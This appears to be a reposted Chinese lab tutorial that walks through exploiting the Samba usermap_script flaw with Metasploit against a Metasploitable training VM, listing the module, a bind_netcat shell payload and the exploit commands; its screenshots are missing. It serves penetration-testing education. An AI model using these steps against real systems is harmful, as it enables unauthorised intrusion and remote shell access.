Metaspliot 控制终端利用Samba漏洞渗透
Samba簡介
Samba是linux和unix系統上實現smb協議的一個免費軟件,由服務器及客戶端程序構成,Samba是面向Linux和Unix環境的Windows互操作性套件。它適用于在可能包括Linux、Unix、Windows、macOS及其他操作系統的異構環境下工作的那些人。Samba使用服務器消息塊(SMB)協議,Windows系統使用該協議相互聯系。使用Samba,你可以讓Linux系統將驅動器映射到Windows系統,可以讓Windows系統將驅動器映射到Linux系統,不過后者的可能性大得多。Samba讓你可以在Linux系統上模擬文件和打印服務。
實驗環境
BT5 R1(攻擊機):10.10.29.128
Metasploitable_ubuntu:10.10.29.254
前提條件:兩臺機子能互ping通
實驗步驟
1,使用命令msfconsole進入終端控制臺接口
2,使用search命令從Metasploit滲透代碼中找出攻擊Samba服務的模塊
找到針對usermap_script安全漏洞的滲透攻擊模塊名稱為multi/samba/usermap_script。
3,運行use multi/samba/usermap_scrip 命令選擇此滲透模塊
4,通過show payloads 查看該滲透攻擊模塊相兼容的攻擊載荷,執行set payload cmd/unix/bind_netcat 選擇bind_netcat,通過netcat攻擊在滲透攻擊成功后執行shell,并通過netcat綁定在一個監聽端口
5,這里采用 cmd/unix/bind_netcat,使用netcat工具在滲透成功后執行Shell,并通過netcat綁定在一個監聽端口。
6,設置完攻擊載荷,查看需要配置的參數:
7,看到RHOST需要設置,其它選擇默認設置,將RHOST設置為靶機IP10.10.29.254
8,輸入命令 “exploit”開始執行
查看地址
?
?
?
?
?
總結
以上是生活随笔為你收集整理的Metaspliot 控制终端利用Samba漏洞渗透的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Kali利用msf对MS10_061漏洞
- 下一篇: Metasploit入门用法(主动攻击)